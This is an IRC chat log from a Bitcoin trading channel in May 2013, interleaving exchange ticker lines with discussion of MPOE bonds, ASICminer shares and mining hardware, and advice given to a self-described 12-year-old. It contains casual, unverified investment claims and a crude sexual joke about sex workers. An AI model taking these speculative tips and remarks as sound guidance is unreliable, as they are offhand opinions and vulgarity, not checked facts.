May 09 22:07:39 [MPEX] [S.MPOE] 7800 @ 0.00071367 = 5.5666 BTC [-] May 09 22:07:41 [MPEX] [S.MPOE] 10000 @ 0.00071 = 7.1 BTC [-] May 09 22:07:43 [MPEX] [S.MPOE] 3453 @ 0.00070978 = 2.4509 BTC [-] May 09 22:07:44 [MPEX] [S.MPOE] 5521 @ 0.00070758 = 3.9065 BTC [-] May 09 22:07:46 [MPEX] [S.MPOE] 1361 @ 0.00070674 = 0.9619 BTC [-] May 09 22:08:28 [BTCTC] [ASICMINER-PT] 5 @ 1.466 = 7.33 BTC [+] May 09 22:08:57 [BTCTC] [ASICMINER-PT] 1 @ 1.48 BTC [+] May 09 22:10:52 [BTCTC] [ASICMINER-PT] 1 @ 1.484599 BTC [+] May 09 22:10:58 [BTCTC] [ASICMINER-PT] 21 @ 1.4846 = 31.1766 BTC [+] May 09 22:13:21 BUY MPOE May 09 22:13:23 BUY BUY BUY May 09 22:16:06 [HAVELOCK] [ASICM] 52 @ 0.0148 = 0.7696 BTC [+] May 09 22:17:06 [HAVELOCK] [SDICE] 2 @ 0.2998 = 0.5996 BTC [+] May 09 22:25:06 [HAVELOCK] [ASICM] 15 @ 0.0149 = 0.2235 BTC [+] May 09 22:30:06 [HAVELOCK] [ASICM] 35 @ 0.0149 = 0.5215 BTC [+] May 09 22:37:04 boring market... May 09 22:38:08 wanna see some action... mircea_popescu what about buying 5000 BTC on market order ? May 09 22:38:39 noty. May 09 22:38:44 action is bad for business. May 09 22:39:02 boring... May 09 22:39:18 pushing it up to 150 would be good for business too May 09 22:40:23 feels like everybody fell asleep watching the market May 09 22:41:04 boring is the idea. May 09 22:41:14 boring pushes worhtless speculators out and actual business in. May 09 22:41:19 this is kinda what we want to happen. May 09 22:41:40 yeah i know May 09 22:41:40 kinda sucked all the benefit from speculators dry, got the press, that pie is eaten. May 09 22:42:01 the game now is being boring. May 09 22:42:02 but couldnt this happen a bit more up? May 09 22:42:16 just wait May 09 22:42:28 well anything could jhappen May 09 22:42:28 congestion is followed by moves May 09 22:43:54 http://www.sierrachart.com/image.php?l=1367650070909.png May 09 22:44:01 we're off my prophecy May 09 22:44:08 nobody is save now May 09 22:46:05 [HAVELOCK] [ASICM] 35 @ 0.01499 = 0.5247 BTC [+] May 09 22:46:06 [HAVELOCK] [ASICM] 50 @ 0.015 = 0.75 BTC [+] May 09 22:46:08 [HAVELOCK] [ASICM] 15 @ 0.01512 = 0.2268 BTC [+] May 09 22:46:37 http://trilema.com/2012/gtrl-or-gtfo/#comment-93130 May 09 22:46:40 ok this kicks ass May 09 22:46:55 apparently they aren't related to the pumping ?! May 09 22:47:05 [HAVELOCK] [ASICM] 9 @ 0.01512 = 0.1361 BTC [+] May 09 22:47:26 [BTCTC] [B.YABMC] 1 @ 0.01673 BTC [+] May 09 22:47:39 [BTCTC] [B.YABMC] 49 @ 0.01674 = 0.8203 BTC [+] May 09 22:48:05 [HAVELOCK] [ASICM] 25 @ 0.01519 = 0.3798 BTC [+] May 09 22:48:45 [BTCTC] [PAJKA.BOND] 5 @ 0.1056 = 0.528 BTC [-] May 09 22:48:47 [BTCTC] [B.YABMC] 1 @ 0.01674 BTC [+] May 09 22:49:05 [HAVELOCK] [ASICM] 12 @ 0.01519 = 0.1823 BTC [+] May 09 22:49:12 [BTCTC] [B.YABMC] 50 @ 0.01776 = 0.888 BTC [+] May 09 22:50:05 [HAVELOCK] [ASICM] 2 @ 0.01519 = 0.0304 BTC [+] May 09 22:50:46 i think there has to happen something to influence more people foreign to btc. Cant imagine that without an event with greater impact the market could go out of this quietness May 09 22:51:13 New chip/board status: not arriving tomorrow. May 09 22:51:39 lol jborkl May 09 22:51:59 socking news eh? May 09 22:52:03 shocking May 09 22:52:05 [HAVELOCK] [ASICM] 39 @ 0.0152 = 0.5928 BTC [+] May 09 22:52:56 mircea_popescu, whats you oppinion on future market movements? May 09 22:53:09 i dunno ? May 09 22:53:55 b0n1: translation: he doesn't care May 09 22:54:05 [HAVELOCK] [ASICM] 11 @ 0.01519 = 0.1671 BTC [-] May 09 22:54:15 "the only thing feeps shear is being left out" May 09 22:54:24 u don sae May 09 22:54:47 ideally I would think mircea_popescu would want the price to be stable more than anything, despite the spot price May 09 22:55:26 well simply put if people can't do business in btc people won't do business in btc May 09 23:00:29 jborkl: what channel is that from? May 09 23:01:32 I got it from a private channel, and reposted it May 09 23:01:40 not directed at me May 09 23:02:06 jborkl: just two more weeks! May 09 23:02:32 shit, I have been saying that since November May 09 23:03:49 no fucking way two weeks ? May 09 23:04:26 I don't think so, I think I will not see anything - minimum 1 month May 09 23:04:32 most likely longer May 09 23:04:54 b0n1: mp is running a a financial operation that makes money when the market stays flat. he'll want the market to stay flat. May 09 23:04:58 that is just what I am thinking May 09 23:05:05 [MPEX] [S.MPOE] 3639 @ 0.00070674 = 2.5718 BTC [-] May 09 23:05:09 actually, this might be a good time to subscribe to an MPOE bond issuance. May 09 23:05:12 [MPEX] [S.MPOE] 2661 @ 0.0007058 = 1.8781 BTC [-] May 09 23:05:32 you if you're crazy and desire absurd returns and don't care about wacky principal writedowns... May 09 23:09:43 benkay: actually mpoe bonds are sometimes good during volatility... May 09 23:10:06 [HAVELOCK] [ASICM] 11 @ 0.0152 = 0.1672 BTC [+] May 09 23:10:22 it's only when the volatility is so extreme that insuring against price momvements is like trying to provide flood insurance during the great flood May 09 23:11:05 [HAVELOCK] [ASICM] 2 @ 0.0144 = 0.0288 BTC [-] May 09 23:11:06 [HAVELOCK] [ASICM] 10 @ 0.015 = 0.15 BTC [+] May 09 23:11:08 [HAVELOCK] [ASICM] 200 @ 0.01480001 = 2.96 BTC [-] May 09 23:11:09 [HAVELOCK] [ASICM] 109 @ 0.0148 = 1.6132 BTC [-] May 09 23:11:10 [HAVELOCK] [ASICM] 200 @ 0.01460001 = 2.92 BTC [-] May 09 23:11:11 [HAVELOCK] [ASICM] 161 @ 0.0146 = 2.3506 BTC [-] May 09 23:11:12 [HAVELOCK] [ASICM] 70 @ 0.0145 = 1.015 BTC [-] May 09 23:11:12 [HAVELOCK] [ASICM] 192 @ 0.01440001 = 2.7648 BTC [-] May 09 23:11:59 b0n1: mp is running a a financial operation that makes money when the market stays flat. << this isn't actually right May 09 23:12:10 atm the market is flat and im making a ton because people shortsold. May 09 23:12:32 why did people short sell? May 09 23:12:47 prolly in anticipation of big moves May 09 23:12:50 I think people short sold because buying was too expensive. May 09 23:13:21 [BTCTC] [PAJKA.BOND] 3 @ 0.1056 = 0.3168 BTC [-] May 09 23:13:22 [BTCTC] [ASICMINER-PT] 1 @ 1.476999 BTC [-] May 09 23:13:28 mircea_popescu how would you describe the underwriting operation? May 09 23:13:39 [BTCTC] [PAJKA.BOND] 17 @ 0.1057 = 1.7969 BTC [+] May 09 23:13:51 bonds make money when the option traders are wrong May 09 23:14:00 option traders make money *(from the bonds) when they are right May 09 23:14:04 it doesn't matter if flat, up, down. May 09 23:14:10 it just matters if right or wrong May 09 23:14:17 [BTCTC] [ASICMINER-PT] 2 @ 1.477 = 2.954 BTC [+] May 09 23:14:47 [BTCTC] [ASICMINER-PT] 1 @ 1.4788 BTC [+] May 09 23:15:30 [MPEX] [S.MPOE] 3700 @ 0.0007058 = 2.6115 BTC [-] May 09 23:18:44 thanks, mp May 09 23:19:08 hence why the bot takes it hard during months of huge moves May 09 23:19:48 makes some guesses about where price will end up based on whatever, and when those numbers are exceeded and there are options traders on the other side... May 09 23:20:27 yeah May 09 23:20:36 sometimes it makes a killing, like the 10k in jan or w./e it was May 09 23:20:45 sometimes it gets hammered, like the 15k in march May 09 23:20:47 such it goes. May 09 23:20:59 [BTCTC] [B.YABMC] 1 @ 0.01799 BTC [+] May 09 23:21:06 [HAVELOCK] [HIM] 3 @ 2.24 = 6.72 BTC [+] May 09 23:21:10 the value of the capital structure of course being that risk is correctly distributed so as to not generate the sort of problems irl banks have May 09 23:22:06 [HAVELOCK] [HIM] 2 @ 2 = 4 BTC [-] May 09 23:22:45 [BTCTC] [TAT.ASICMINER] 5 @ 0.0146 = 0.073 BTC [-] May 09 23:23:02 what is the structure of afk banks, and the risk distribution therein? May 09 23:23:07 [HAVELOCK] [HIM] 2 @ 2.3 = 4.6 BTC [+] May 09 23:23:15 benkay: MPOE bot doesn't hold capital May 09 23:23:39 I understand the MPEx/MPOE structure fairly well, tsp. May 09 23:23:48 [BTCTC] [ASICMINER-PT] 2 @ 1.478 = 2.956 BTC [-] May 09 23:23:54 it's the contrast I'm lacking detail on. May 09 23:24:01 [MPEX] [S.DICE] 240 @ 0.0033 = 0.792 BTC [-] May 09 23:24:06 [HAVELOCK] [HIM] 2 @ 2 = 4 BTC [-] May 09 23:24:27 [MPEX] [S.MPOE] 500 @ 0.00071189 = 0.3559 BTC [+] May 09 23:24:39 apologies for interrupting. please continue. May 09 23:26:05 [HAVELOCK] [HIM] 2 @ 2 = 4 BTC [-] May 09 23:27:08 nah i misread what you said lol May 09 23:28:07 [HAVELOCK] [HIM] 5 @ 2.26 = 11.3 BTC [+] May 09 23:28:20 http://mpexcharts.com/mpsic/S.MPOE/ May 09 23:28:24 pretty cool pizzaman1337 stuff! May 09 23:30:32 [BTCTC] [TAT.ASICMINER] 6 @ 0.0146 = 0.0876 BTC [-] May 09 23:31:36 [MPEX] [S.MPOE] 4285 @ 0.0007058 = 3.0244 BTC [-] May 09 23:31:38 [MPEX] [S.MPOE] 4465 @ 0.00070254 = 3.1368 BTC [-] May 09 23:34:06 [HAVELOCK] [HIM] 10 @ 2.0001 = 20.001 BTC [-] May 09 23:35:06 [HAVELOCK] [ASICM] 4 @ 0.0148 = 0.0592 BTC [+] May 09 23:36:06 [HAVELOCK] [SDICE] 3 @ 0.29999999 = 0.9 BTC [+] May 09 23:37:11 mircea_popescu: what is the risk distribution and capital structure of afk banks you avoided with the MPEx structuring? May 09 23:37:38 benkay irl you mean ? May 09 23:38:06 [HAVELOCK] [HIM] 6 @ 2.0001 = 12.0006 BTC [-] May 09 23:38:12 sure May 09 23:38:14 semantics May 09 23:38:30 (as if to imply these conversations and businesses are not real...) May 09 23:38:45 [BTCTC] [ASICMINER-PT] 4 @ 1.4769 = 5.9076 BTC [-] May 09 23:38:45 irl banks aspire to the vaunted "tbtf" status, which means their mpoe bondholders are the taxpayers, and the interest rate is fixed May 09 23:38:48 and very low. May 09 23:38:56 gotcha May 09 23:39:06 [HAVELOCK] [SDICE] 3 @ 0.2998 = 0.8994 BTC [-] May 09 23:39:40 hey you. May 09 23:39:43 LOL May 09 23:39:43 lol May 09 23:40:07 [HAVELOCK] [SDICE] 3 @ 0.3 = 0.9 BTC [+] May 09 23:40:20 !l m s.dice May 09 23:40:20 Last trade for S.DICE on MPEX was at 0.0033 BTC [-] May 09 23:41:48 [BTCTC] [ASICMINER-PT] 1 @ 1.4769 BTC [-] May 09 23:42:06 [HAVELOCK] [ASICM] 80 @ 0.0152 = 1.216 BTC [+] May 09 23:42:58 [BTCTC] [ASICMINER-PT] 1 @ 1.4769 BTC [-] May 09 23:45:43 [BTCTC] [ASICMINER-PT] 1 @ 1.434001 BTC [-] May 09 23:45:47 [BTCTC] [ASICMINER-PT] 1 @ 1.434 BTC [-] May 09 23:46:00 [BTCTC] [ASICMINER-PT] 1 @ 1.431001 BTC [-] May 09 23:46:11 [BTCTC] [ASICMINER-PT] 1 @ 1.431 BTC [-] May 09 23:47:15 [MPEX] [S.MPOE] 10885 @ 0.00070254 = 7.6471 BTC [-] May 09 23:47:17 [MPEX] [S.MPOE] 9500 @ 0.00070133 = 6.6626 BTC [-] May 09 23:47:21 [MPEX] [S.MPOE] 4223 @ 0.00069905 = 2.9521 BTC [-] May 09 23:51:07 [HAVELOCK] [ASICM] 358 @ 0.0152 = 5.4416 BTC [+] May 09 23:52:16 [BTCTC] [ASICMINER-PT] 1 @ 1.476499 BTC [+] May 09 23:59:06 [HAVELOCK] [ASICM] 500 @ 0.0152 = 7.6 BTC [+] May 10 00:01:06 [HAVELOCK] [ASICM] 512 @ 0.0152 = 7.7824 BTC [+] May 10 00:02:06 [HAVELOCK] [ASICM] 100 @ 0.01525 = 1.525 BTC [+] May 10 00:03:06 [HAVELOCK] [ASICM] 687 @ 0.01525 = 10.4768 BTC [+] May 10 00:06:07 [HAVELOCK] [ASICM] 420 @ 0.0155 = 6.51 BTC [+] May 10 00:12:00 [BTCTC] [PAJKA.BOND] 2 @ 0.1057 = 0.2114 BTC [+] May 10 00:12:44 [BTCTC] [PAJKA.BOND] 45 @ 0.10597 = 4.7687 BTC [+] May 10 00:14:06 [HAVELOCK] [ASICM] 25 @ 0.01525 = 0.3813 BTC [-] May 10 00:15:41 !ticker h asicm May 10 00:15:42 [HAVELOCK:ASICM] 1D: 0.01290000 / 0.01446685 / 0.01595000 (24785 shares, 358.56083442 BTC), 7D: 0.01290000 / 0.01446563 / 0.01595000 (24805 shares, 358.81983442 BTC), 30D: 0.01290000 / 0.01446563 / 0.01595000 (24805 shares, 358.81983442 BTC) May 10 00:16:13 whoop May 10 00:17:10 :) May 10 00:20:06 [HAVELOCK] [ASICM] 500 @ 0.01445 = 7.225 BTC [-] May 10 00:20:07 [HAVELOCK] [ASICM] 225 @ 0.01440001 = 3.24 BTC [-] May 10 00:20:09 [HAVELOCK] [ASICM] 1 @ 0.0144 BTC [-] May 10 00:24:19 anyone here good with javascript? May 10 00:25:07 [HAVELOCK] [ASICM] 25 @ 0.015 = 0.375 BTC [+] May 10 00:26:48 [BTCTC] [ASICMINER-PT] 1 @ 1.476394 BTC [-] May 10 00:27:01 [BTCTC] [ASICMINER-PT] 1 @ 1.476395 BTC [+] May 10 00:28:06 [HAVELOCK] [ASICM] 1 @ 0.015 BTC [+] May 10 00:28:39 This is a really dumb question, but if more people buy ASICminer shares, would I get less dividends? May 10 00:28:44 Are more ASICminer shares constantly being introduced? May 10 00:28:45 no May 10 00:28:51 [BTCTC] [ASICMINER-PT] 2 @ 1.4764 = 2.9528 BTC [+] May 10 00:28:57 there are a fixed amount of shares May 10 00:29:04 Oh alright. May 10 00:29:55 welcome to assets, WILLdude May 10 00:30:39 what if he meant indirectly May 10 00:32:29 [BTCTC] [ASICMINER-PT] 1 @ 1.476 BTC [-] May 10 00:32:43 every asicminer shares always gets equal payout May 10 00:33:09 if you buy your shares from an exchange, some of the operators do take a % as a management fee May 10 00:33:27 each operator has their own details for how they manage their asset May 10 00:33:32 Were the recent dividends unusually high? May 10 00:33:49 yes and no May 10 00:34:00 they were higher than normal May 10 00:34:08 but because they have grown faster than normal May 10 00:34:16 this growth may continue May 10 00:34:26 if they stick to the plan May 10 00:34:33 it may actually go up May 10 00:34:48 but long term it could go down too May 10 00:34:55 hey I'm looking to potentially do some OTC exotic options, if anyone has any interest/input hit me up May 10 00:34:57 it's all up to how they manage the business and profits May 10 00:35:00 we need blogs discussing these things ;/ May 10 00:35:19 aneeshmehta nobody does "exostic options" for the sake of them being exotic. May 10 00:35:24 there is an ASICMINER for dummies thread I think May 10 00:35:31 that tries to sum things up May 10 00:35:35 blogs are so much better than threads tho May 10 00:35:37 the official thread is a nightmare May 10 00:35:53 liek 50000000 pages May 10 00:36:04 it is. May 10 00:38:06 that furkinap(?) dude has a blog post about buing ma May 10 00:38:18 buying* May 10 00:40:37 mircea_popescu thanks I get that, that's why I'm looking OTC May 10 00:41:47 Is there a reasonably good chance that I'd at least get my investment returned? May 10 00:42:05 from dividends alone? May 10 00:42:09 unlikely May 10 00:42:18 but you could collect dividends May 10 00:42:22 then sell your shares May 10 00:42:27 [BTCTC] [ASICMINER-PT] 1 @ 1.4764 BTC [+] May 10 00:42:27 and possibly make profit May 10 00:42:38 just depends on what the share price does May 10 00:42:44 lately its going up still May 10 00:42:54 if divs are even higher next week May 10 00:42:57 itll keep going up May 10 00:43:11 I might buy into it soon. May 10 00:43:15 you just have to be in front of the wave May 10 00:43:26 to avoid a wipe out ;) May 10 00:43:26 Meaning? May 10 00:43:27 you should keep in mind that nobody knows who AM are, they are operating an illegal business in a country with no real laws May 10 00:43:45 Really? May 10 00:43:45 the risk is a lot higher than any conventional investment May 10 00:43:46 at current prices they'd have to mine ~500k btc in ordeer to pay you back from divs. May 10 00:43:53 that's about 20k blocks May 10 00:43:58 dub is the devil on your shoulder, my role as angel is done May 10 00:43:59 hehe May 10 00:44:06 they may make dough from selling gear, they may havenses, May 10 00:44:13 they may encounter problems of all sorts, it's a tossup May 10 00:44:24 btc itself is a risk May 10 00:44:33 yo dawg i herd u liek risk May 10 00:44:33 once you start investing May 10 00:44:41 you start piling on risks May 10 00:44:51 so i incorporated some businesses in your bitcoin space to pile risk on your risk so you can invest while you invest May 10 00:45:01 I'm only planning on 0.5 btc worth of investement. May 10 00:45:04 gamble while you gable May 10 00:45:07 *investment May 10 00:45:17 well the worst hat can happen to .5 btc worth of investment May 10 00:45:22 benkay, that's not risky enough for me May 10 00:45:22 is that you lose a nice meal May 10 00:45:25 (at like mendy's) May 10 00:45:26 i want May 10 00:45:30 riskception May 10 00:46:36 for people like me that bought AM at $150 May 10 00:46:51 if you say so... May 10 00:46:57 you have justa s much to lose May 10 00:47:08 how do you figure? May 10 00:47:35 its worth what its worth 100% loss for you = the same total loss as anyone else May 10 00:47:46 you are just losing "profit" May 10 00:47:59 but I've already recouped many times over May 10 00:48:00 you two have a nice accounting dispute started May 10 00:48:06 the equivalent of semantics but with monyz May 10 00:48:10 [BTCTC] [ASICMINER-PT] 2 @ 1.4769 = 2.9538 BTC [+] May 10 00:48:23 if you have a million bucks in the back May 10 00:48:25 abank May 10 00:48:31 and $50 falls out your pocket May 10 00:48:36 you lost $50 May 10 00:48:42 if i have $100 in the bank May 10 00:48:48 and $50 falls out my pocket May 10 00:48:53 I lost $50 May 10 00:49:07 is your pocket at the bank? May 10 00:49:19 i made my point May 10 00:49:23 not gonna belabor it May 10 00:49:37 it makes no sense to me but you made it May 10 00:49:56 you are just finding justifications for your loss May 10 00:49:59 its still a oss May 10 00:50:03 l May 10 00:50:23 rather, rationalizations May 10 00:50:24 its a loss of potential profit well over and above the profit I've already made May 10 00:50:42 lyspooner the other pocket is at the bank May 10 00:51:11 mp, dont you have some sort of hooker analogy for this? May 10 00:52:40 lmao May 10 00:52:48 im all hookered out. May 10 00:52:53 nuts May 10 00:54:20 say I call and order two hookers but three show up, I bust a load on six titties May 10 00:54:35 they havent left yet but they could at any time May 10 00:55:00 these hookers charge up front May 10 00:55:03 you're saying when they leave I lose? May 10 00:55:04 dont they? May 10 00:55:12 yes May 10 00:55:16 which means if they leave before you bust your nut May 10 00:55:21 youre fucked May 10 00:55:25 :) May 10 00:55:28 I've alreeady nutted three times May 10 00:55:36 this is a very bad analogy. very very bad analogy. May 10 00:55:50 it matches his presumption May 10 00:55:53 [BTCTC] [TAT.ASICMINER] 10 @ 0.0146 = 0.146 BTC [-] May 10 00:55:57 make a blog about bad analogies May 10 00:56:05 how did you nut? May 10 00:56:20 you have to sell shares to nut May 10 00:56:33 at the moment I'm up at least 1.5 jizzloads May 10 00:56:40 lol May 10 00:56:44 what happens if you re-invest the dividends that come out of your shares? May 10 00:56:56 you get extra nut May 10 00:57:11 your nut gets bigger May 10 00:57:13 ... May 10 00:57:23 i suspect i'm being trolled here May 10 00:57:46 I srsly don't see your point May 10 00:57:55 ok.. May 10 00:58:02 your shares are worth X dollars May 10 00:58:09 dub it's like this : if you lose what you were merely promised or what you actually owned, May 10 00:58:09 you dont get that X May 10 00:58:12 unless you sell May 10 00:58:23 from a certain equitable perspective to present valuer you lose the same. May 10 00:58:23 I have more BTC out (from divs) than I put in, I still have the shares that are worth many many more times what I bought for May 10 00:58:56 this because the difference between ownership and promise is nil May 10 00:59:08 (they both being a promise of performance made by the world at large) May 10 01:00:22 this is why it's called equitable, because it equates May 10 01:00:28 this is the root of the word equity too May 10 01:01:05 this does not change that if AM walk tomorrow, I have 150% of my investment May 10 01:01:42 it also isnt related to that May 10 01:02:18 that thinking will lead to you allowing yourself to lose money May 10 01:02:34 it's a convenient rationale May 10 01:03:15 for example May 10 01:03:20 you say you want to wait for 2BTC May 10 01:03:23 to sell your shares May 10 01:03:31 but if they become worth 0 before then May 10 01:03:39 you get 0 for them May 10 01:03:42 but if you sell now May 10 01:03:44 I still have 150% of what I put in May 10 01:03:48 you get 1.4 or such May 10 01:03:59 good for you May 10 01:04:09 that is a past success May 10 01:04:14 that is not a loss May 10 01:04:24 no it is not May 10 01:04:37 but your 1.4BTC shares becoming worth 0 certianly would be May 10 01:04:49 my goodness May 10 01:05:27 maybe you'd prefere to call it, May 10 01:05:30 [BTCTC] [B.YABMC] 100 @ 0.017 = 1.7 BTC [-] May 10 01:05:31 and unrealized gain May 10 01:05:34 :/ May 10 01:05:40 an* May 10 01:06:43 that can be our channel motto: May 10 01:06:54 "There are no losses, only unrealized gains." May 10 01:10:37 [BTCTC] [B.YABMC] 93 @ 0.0165 = 1.5345 BTC [-] May 10 01:12:20 [BTCTC] [TAT.ASICMINER] 52 @ 0.0146 = 0.7592 BTC [-] May 10 01:17:31 [BTCTC] [TAT.ASICMINER] 13 @ 0.014679 = 0.1908 BTC [+] May 10 01:17:43 stupid internets May 10 01:17:43 [BTCTC] [TAT.ASICMINER] 25 @ 0.014679 = 0.367 BTC [+] May 10 01:18:14 ThickAsThieves: what I was not understanding is that you were making a point too obvious for my point parser to identify May 10 01:19:02 "in any dispute, the intensity of feeling is inversely proportional to the value of issues at stake." May 10 01:19:52 Urgh. I have no clue what to do. I'm not sure if I should invest in ASICminer or buy a BF May 10 01:19:56 *BFL May 10 01:20:05 For 280 pounds. May 10 01:20:29 do not buy a bfl May 10 01:20:39 Just buy bitcoins and observe what happens. May 10 01:20:40 buy a bfl! May 10 01:20:45 nono May 10 01:20:48 don't buy bitcoins May 10 01:20:49 they're a scam May 10 01:21:01 if you MUST be in the mining game, asicminer shares are the way to go May 10 01:21:15 at least they are pretty liquid May 10 01:21:18 Bugpowder or you can buy avalon chips May 10 01:21:23 And build some shit May 10 01:21:25 and denominated in bitcoins May 10 01:21:43 thestringpuller: this guy is not looking for that level of commitment May 10 01:21:57 you may never get the Jalapeno May 10 01:22:04 It's not really that much commitment. You can attach the shiggity to a breadboard in a day easy May 10 01:22:06 and when you do, it will be worthless May 10 01:22:14 the data-in/data-out will work with cgminer May 10 01:22:23 um, 280 pounds.. that happens to fit current price of casascius first edition coin May 10 01:22:29 mining sux May 10 01:22:33 jurov: are you shitting me? May 10 01:22:37 i have a bunch of those May 10 01:22:45 well, a handful May 10 01:23:27 Bugpowder: https://bitcointalk.org/index.php?topic=186198.0 May 10 01:23:57 ended up 3btc/coin May 10 01:24:00 That is after VAT and shipping, May 10 01:24:43 Is pyramining good? May 10 01:25:25 lol May 10 01:25:38 just buy coins and sit on them May 10 01:25:57 How does it compare with asicminer May 10 01:26:06 asicminer is a real company May 10 01:26:14 pyramining is a ponzi scheme May 10 01:26:18 (I think) May 10 01:27:14 The faq disagrees. May 10 01:27:20 which faq? May 10 01:27:42 I haven't looked into it really May 10 01:27:49 but it sounds scammy May 10 01:28:00 and given that 99% of all bitcoin ventures are scams May 10 01:28:10 well… I wouldn't trust it May 10 01:28:18 yes, you're basically talking with scammers here May 10 01:28:31 Lol May 10 01:29:07 don't get greedy man. enjoy the gravy train that are bitcoins May 10 01:29:07 Will dude.. lurk moar May 10 01:29:13 "you cannot scam an honest man" May 10 01:29:37 searching for outsized returns will get you proper fucked. May 10 01:29:37 buy some coins and sit on them May 10 01:29:46 better yet, come up with a business that generates coins. May 10 01:29:46 buy more on the next big dip May 10 01:30:05 probably a bad ideas benkay, most businesses fail May 10 01:30:07 no, what benkay said May 10 01:30:22 If you have no clue, just buy and hold May 10 01:30:32 here's the thing about businesses May 10 01:30:36 your first 10 fail May 10 01:30:48 hopefully you learn something May 10 01:30:59 and #11 doesn't blow up quite as hard May 10 01:31:05 repeat until you can actually make money May 10 01:31:40 thoughts? May 10 01:31:53 ... yes May 10 01:32:20 you already agreed with me dude :P May 10 01:32:39 But for web based businesses, which has less costs May 10 01:32:43 [BTCTC] [TAT.ASICMINER] 2 @ 0.014679 = 0.0294 BTC [+] May 10 01:32:52 oh duh May 10 01:32:53 You'll get more who turn a profit, but less which succeed. May 10 01:32:58 don't start capital intensive businesses May 10 01:33:09 Hmm. May 10 01:33:14 well...if i had to fail 10 times i'd forgot btc completely May 10 01:33:18 It's easier to have a profit margin, but harder to get enough profit that it's worth the time. May 10 01:33:34 iterate to profit May 10 01:33:40 fire bad clients May 10 01:33:42 I have a kinda job offer from someone willing to pay bitcoins. May 10 01:33:42 and cheap clients May 10 01:33:46 wat who May 10 01:33:54 they're scamming you send them to me May 10 01:34:20 It's just a quick python program they want me to write. May 10 01:34:31 I offered on /r/Jobs4Bitcoins May 10 01:35:09 Someone has replied, and he'll let me know at some point the details. May 10 01:35:18 Idc if I'm being scammed. May 10 01:35:37 you are send him to me May 10 01:35:49 No. May 10 01:35:53 d'oh May 10 01:36:07 okay. after benkay does a short process with your wannabe employer May 10 01:36:16 then i'm interested too in your services May 10 01:37:07 What? May 10 01:37:40 I'll ask for identification and set out terms for it. May 10 01:38:25 ooh, so your employer shall be properly identified? May 10 01:38:36 as opposed to some scammy asset? :D May 10 01:39:52 sorry i'm in trollish mood a bit. just send me your Jobs4Bitcoins page to check up May 10 01:40:56 http://www.reddit.com/r/Jobs4Bitcoins/comments/1dkaws/forhire_python_developer/ May 10 01:41:09 I didn't mention I'm 12 May 10 01:41:18 I think I'll leave that out, May 10 01:41:29 i am 12 and what is this May 10 01:43:07 dude, you'll learn, don't worry. May 10 01:44:39 ha! May 10 01:44:55 coding for bitcoins is a good plan May 10 01:45:07 good luck May 10 01:45:33 Weed is getting stronger every two weeks. http://www.youtube.com/watch?v=2uLQOYtpZsA May 10 01:46:28 Willdude123: sent msg on reddit, as rini17 May 10 01:46:51 Sent me a message or him? May 10 01:47:35 Oh ok. May 10 01:47:52 I'm afraid I have nothing provable. May 10 01:48:41 But I won't charge very much. Maybe not even at all if you aren't satisfied. May 10 01:49:01 np, i have some ideas for simpler tasks and we'll see. May 10 01:49:52 never mention free work! especially not in such scammer channel ;) May 10 01:49:58 seriously dude May 10 01:50:04 also don't tell people you are 12 May 10 01:50:07 [HAVELOCK] [ASICM] 200 @ 0.0146 = 2.92 BTC [-] May 10 01:50:33 thats like more than hashking May 10 01:50:38 is fine May 10 01:51:01 12 year olds could not have understood bitcoin when it was introduced in 2009 May 10 01:51:53 you should keep in mind that nobody knows who AM are, they are operating an illegal business asicminer is a real company May 10 01:52:06 Makes you wonder, if its an illegal company, is it a real company? May 10 01:52:13 There is no spoon. May 10 01:52:18 it's really illegal May 10 01:52:27 ohhhh that makes sense! May 10 01:52:44 Can't be a real ESTATE company, thats not what they do. May 10 01:53:17 [MPEX] [S.MPOE] 4300 @ 0.00071168 = 3.0602 BTC [+] May 10 01:53:25 ;p; May 10 01:53:28 lol* May 10 01:54:11 I was gambling last month in Ft. Lauderdale, Florida with my buddy and these hookers stopped by our blackjack table..If you've been around the block a few times as we have, they're obvious. May 10 01:54:18 They were getting wet and all over our chips. May 10 01:58:07 [HAVELOCK] [ASICM] 25 @ 0.015 = 0.375 BTC [+] May 10 01:58:08 [HAVELOCK] [ASICM] 25 @ 0.01512 = 0.378 BTC [+] May 10 01:58:10 [HAVELOCK] [ASICM] 50 @ 0.01525 = 0.7625 BTC [+] May 10 01:59:06 [HAVELOCK] [SDICE] 2 @ 0.3 = 0.6 BTC [+] May 10 01:59:33 So they split and my buddy and I were talking..if they suck off 8 men per night, and the average penis size is what, 8" inches..thats 64" inches of dick per night..so lets say they work a 6-day work week. Thats 64 X 6 = 384 inches or about 32 feet of dick per week.. 32 X 4 weeks is 128 feet of dick per month..and 128 X 12 months is 1536 feet of dick per year. Over a quarter mile of May 10 01:59:34 dick to suck per year. May 10 01:59:38 Thats a lot of dick. May 10 02:01:58 If the average load is 2 oz..thats 36 US gallons of sperm..or 136.275 Liters. May 10 02:02:13 What is the average retirement age.. May 10 02:03:26 After going through that exercise its obvious they need savings or retirement plans. May 10 02:03:42 How much total power has the ASICminer chip farm got? May 10 02:04:45 Willdude123: http://www.asicminer.co/figures.html May 10 02:05:30 or is the "Harshrate" 15th already? May 10 02:09:07 [HAVELOCK] [ASICM] 5 @ 0.01525 = 0.0763 BTC [+] May 10 02:09:08 [HAVELOCK] [ASICM] 84 @ 0.01525 = 1.281 BTC [+] May 10 02:11:35 [MPEX] [O.USD.C101T] 1000 @ 0.15368381 = 153.6838 BTC [-] May 10 02:11:37 [MPEX] [O.USD.C098T] 1000 @ 0.16188182 = 161.8818 BTC [-] May 10 02:19:33 Urgh. May 10 02:19:55 I'm still deciding, ASICminer or BFL miner. May 10 02:20:35 MOAR trilema May 10 02:24:18 [BTCTC] [TAT.ASICMINER] 1 @ 0.014679 BTC [+] May 10 02:26:34 im curious how many people read the whole thing May 10 02:26:35 Willdude123: not trying to be rude but if this much consternation about a $50 investment, perhaps you should be looking at something lower risk? May 10 02:26:44 (the english part i mean, i don't thin the romanian part is doable) May 10 02:27:10 Maybe not sure what. May 10 02:27:14 dub i was thinking "if the position you're in is deciding between am and bfl perhaps more fundamental endeavours need prioritizing" May 10 02:27:38 well yes May 10 02:29:11 I guess the simple analysis is that with AM there is a chance of getting in and out, grabbing a few dollars worth of divs in the middle May 10 02:29:21 while purchasing from BFL is pretty much a certain loss May 10 02:30:40 According to this article BTC is dead..lets all go home and shutdown now guys..its over. May 10 02:30:41 http://www.ft.com/cms/s/0/55733b80-addf-11e2-a2c7-00144feabdc0.html#axzz2SqCmnivP May 10 02:30:47 Back to your day jobs. May 10 02:30:47 (unless you have free power and don't mind waiting a few years) May 10 02:31:04 o 